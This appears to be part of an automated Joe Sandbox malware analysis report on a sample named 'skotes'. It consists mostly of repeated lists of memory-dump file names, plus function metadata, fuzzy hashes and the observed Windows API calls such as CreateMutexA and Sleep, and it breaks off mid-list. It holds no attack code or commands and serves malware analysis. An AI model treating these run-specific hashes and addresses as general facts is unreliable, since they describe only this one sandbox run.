Associated: 00000004.00000002.2314671752.0000000001161000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314693065.0000000001163000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314724657.0000000001174000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314750999.0000000001187000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314772140.000000000118A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314793852.000000000118B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314815800.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314838440.0000000001191000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314857259.0000000001194000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314880107.00000000011A4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314899015.00000000011A7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314924795.00000000011AF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314944760.00000000011B2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314966374.00000000011B3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314987027.00000000011B5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315008217.00000000011B6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315036739.00000000011BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315059328.00000000011BC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315077897.00000000011BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315097820.00000000011C4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315116351.00000000011C6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315135570.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315156562.00000000011CF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315181702.00000000011E1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315204096.00000000011E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315204096.0000000001209000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315258774.000000000123A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315281119.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315306466.000000000123C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315329166.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315350059.0000000001242000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315373381.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315393972.0000000001253000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f30000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: bf553fc402de2f4c6a19de1c715cbefddf5da28cc10998b90e298a9c3564dd5e
Instruction ID: 844ebd5cc1320c15ee4e90085e533fb4a0f9c7c9327ae535ac289d9464317d7e
Opcode Fuzzy Hash: bf553fc402de2f4c6a19de1c715cbefddf5da28cc10998b90e298a9c3564dd5e
Instruction Fuzzy Hash: F1312A31B052049BEB08DB79DCC9B6DB762EBC5334F248618E454EB3D1D7398980EB52

Function 00F39ADC Relevance: 3.1, APIs: 2, Instructions: 107
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00F3A963
CreateMutexA.KERNELBASE(00000000,00000000,00F93254), ref: 00F3A981

Memory Dump Source

Source File: 00000004.00000002.2313199607.0000000000F31000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000004.00000002.2313169314.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2313199607.0000000000F92000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2313427073.0000000000F99000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2313491921.0000000000F9B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2313522792.0000000000FA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314227761.0000000001108000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314307739.000000000110A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314342994.0000000001124000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314342994.0000000001132000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314462347.0000000001135000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314490771.0000000001137000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314511766.0000000001138000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314533241.000000000113B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314561396.000000000114D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314585193.000000000114E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314616140.0000000001160000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314671752.0000000001161000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314693065.0000000001163000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314724657.0000000001174000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314750999.0000000001187000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314772140.000000000118A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314793852.000000000118B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314815800.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314838440.0000000001191000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314857259.0000000001194000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314880107.00000000011A4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314899015.00000000011A7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314924795.00000000011AF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314944760.00000000011B2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314966374.00000000011B3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314987027.00000000011B5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315008217.00000000011B6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315036739.00000000011BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315059328.00000000011BC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315077897.00000000011BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315097820.00000000011C4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315116351.00000000011C6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315135570.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315156562.00000000011CF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315181702.00000000011E1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315204096.00000000011E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315204096.0000000001209000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315258774.000000000123A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315281119.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315306466.000000000123C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315329166.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315350059.0000000001242000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315373381.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315393972.0000000001253000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f30000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: cb0b3a40170098d386a6f9156b25cd69c63599deea8174585253b79001b90f40
Instruction ID: 4716d8d58a080eb815918b25eb85841d5714509fb6e9776e94d600bd10fbe881
Opcode Fuzzy Hash: cb0b3a40170098d386a6f9156b25cd69c63599deea8174585253b79001b90f40
Instruction Fuzzy Hash: 79214C317092019BEB189B6CEC89B6DF761EBC1330F244219E454DB3D1D7B58941EA11

Function 00F3A856 Relevance: 3.1, APIs: 2, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00F3A963
CreateMutexA.KERNELBASE(00000000,00000000,00F93254), ref: 00F3A981

Memory Dump Source

Source File: 00000004.00000002.2313199607.0000000000F31000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000004.00000002.2313169314.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2313199607.0000000000F92000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2313427073.0000000000F99000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2313491921.0000000000F9B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2313522792.0000000000FA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314227761.0000000001108000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314307739.000000000110A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314342994.0000000001124000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314342994.0000000001132000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314462347.0000000001135000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314490771.0000000001137000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314511766.0000000001138000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314533241.000000000113B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314561396.000000000114D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314585193.000000000114E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314616140.0000000001160000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314671752.0000000001161000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314693065.0000000001163000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314724657.0000000001174000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314750999.0000000001187000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314772140.000000000118A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314793852.000000000118B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314815800.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314838440.0000000001191000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314857259.0000000001194000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314880107.00000000011A4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314899015.00000000011A7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314924795.00000000011AF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314944760.00000000011B2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314966374.00000000011B3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314987027.00000000011B5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315008217.00000000011B6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315036739.00000000011BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315059328.00000000011BC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315077897.00000000011BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315097820.00000000011C4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315116351.00000000011C6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315135570.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315156562.00000000011CF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315181702.00000000011E1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315204096.00000000011E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315204096.0000000001209000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315258774.000000000123A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315281119.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315306466.000000000123C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315329166.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315350059.0000000001242000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315373381.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315393972.0000000001253000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f30000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: fc3220d1c052680486b0f1660a08b96f0eb7c2d8ab4f2b8bc43d0b0333d51ae6
Instruction ID: fa07f058ff8fe19f39ed34818ff9fa08d7f63821f52fe037f48d3c87c03dddc3
Opcode Fuzzy Hash: fc3220d1c052680486b0f1660a08b96f0eb7c2d8ab4f2b8bc43d0b0333d51ae6
Instruction Fuzzy Hash: 1E217C717492058AFB28776E9C9AB3DB352DFC1330F240816E5C4D73D1CA7A8981B693

Function 00F3A34F Relevance: 3.1, APIs: 2, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00F3A963
CreateMutexA.KERNELBASE(00000000,00000000,00F93254), ref: 00F3A981

Memory Dump Source

Source File: 00000004.00000002.2313199607.0000000000F31000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000004.00000002.2313169314.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2313199607.0000000000F92000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2313427073.0000000000F99000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2313491921.0000000000F9B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2313522792.0000000000FA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314227761.0000000001108000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314307739.000000000110A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314342994.0000000001124000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314342994.0000000001132000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314462347.0000000001135000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314490771.0000000001137000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314511766.0000000001138000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314533241.000000000113B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314561396.000000000114D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314585193.000000000114E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314616140.0000000001160000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314671752.0000000001161000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314693065.0000000001163000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314724657.0000000001174000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314750999.0000000001187000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314772140.000000000118A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314793852.000000000118B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314815800.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314838440.0000000001191000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314857259.0000000001194000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314880107.00000000011A4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314899015.00000000011A7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314924795.00000000011AF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314944760.00000000011B2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314966374.00000000011B3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314987027.00000000011B5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315008217.00000000011B6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315036739.00000000011BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315059328.00000000011BC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315077897.00000000011BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315097820.00000000011C4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315116351.00000000011C6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315135570.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315156562.00000000011CF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315181702.00000000011E1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315204096.00000000011E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315204096.0000000001209000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315258774.000000000123A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315281119.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315306466.000000000123C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315329166.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315350059.0000000001242000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315373381.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315393972.0000000001253000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f30000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 041bbee0b1dffe994665d17aad15fa3e62b368db600a03196174c3bdb9d6cd34
Instruction ID: faab343a9dccc20028c99d05f8d55d41bc97a52e0bb14c2bb7e51f3b398573cd
Opcode Fuzzy Hash: 041bbee0b1dffe994665d17aad15fa3e62b368db600a03196174c3bdb9d6cd34
Instruction Fuzzy Hash: 70219B327052009BEB089B6DDC89B6DB762EBC1330F344219E454EB3E0C7368980EB52

Function 00F6D82F Relevance: 1.5, APIs: 1, Instructions: 40
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00F6A813,00000001,00000364,00000006,000000FF,?,00F6EE3F,?,00000004,00000000,?,?), ref: 00F6D871

Memory Dump Source

Source File: 00000004.00000002.2313199607.0000000000F31000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000004.00000002.2313169314.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2313199607.0000000000F92000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2313427073.0000000000F99000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2313491921.0000000000F9B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2313522792.0000000000FA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314227761.0000000001108000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314307739.000000000110A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314342994.0000000001124000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314342994.0000000001132000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314462347.0000000001135000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314490771.0000000001137000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314511766.0000000001138000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314533241.000000000113B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314561396.000000000114D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314585193.000000000114E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314616140.0000000001160000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314671752.0000000001161000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314693065.0000000001163000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314724657.0000000001174000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314750999.0000000001187000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314772140.000000000118A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314793852.000000000118B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314815800.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314838440.0000000001191000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314857259.0000000001194000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314880107.00000000011A4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314899015.00000000011A7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314924795.00000000011AF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314944760.00000000011B2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314966374.00000000011B3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314987027.00000000011B5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315008217.00000000011B6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315036739.00000000011BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315059328.00000000011BC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315077897.00000000011BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315097820.00000000011C4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315116351.00000000011C6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315135570.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315156562.00000000011CF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315181702.00000000011E1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315204096.00000000011E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315204096.0000000001209000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315258774.000000000123A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315281119.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315306466.000000000123C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315329166.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315350059.0000000001242000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315373381.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315393972.0000000001253000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f30000_skotes.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 76549611b639777267c271f67a6b8eebb84af3d09e6c87a3332b2afc62a94b7b
Instruction ID: 2c2cdab00741be58679442f6909e765d2a00a8476e599d71f1a10ffd9a62cdbf
Opcode Fuzzy Hash: 76549611b639777267c271f67a6b8eebb84af3d09e6c87a3332b2afc62a94b7b
Instruction Fuzzy Hash: 4CF08232F4522566EB216B769D09B5F7759DF857B0B188122ED08A7182DA34EC01B6E0

Non-executed Functions

Function 00F32EC0 Relevance: 7.8, APIs: 5, Instructions: 272COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 00F32F5F
__Mtx_unlock.LIBCPMT ref: 00F32FCC
__Cnd_broadcast.LIBCPMT ref: 00F32FE3
__Mtx_unlock.LIBCPMT ref: 00F330F5
__Mtx_unlock.LIBCPMT ref: 00F3319B

Memory Dump Source

Source File: 00000004.00000002.2313199607.0000000000F31000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000004.00000002.2313169314.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2313199607.0000000000F92000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2313427073.0000000000F99000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2313491921.0000000000F9B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2313522792.0000000000FA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314227761.0000000001108000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314307739.000000000110A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314342994.0000000001124000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314342994.0000000001132000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314462347.0000000001135000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314490771.0000000001137000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314511766.0000000001138000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314533241.000000000113B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314561396.000000000114D000.00000080.00000001.01000000.00000007.sdmpDownload File
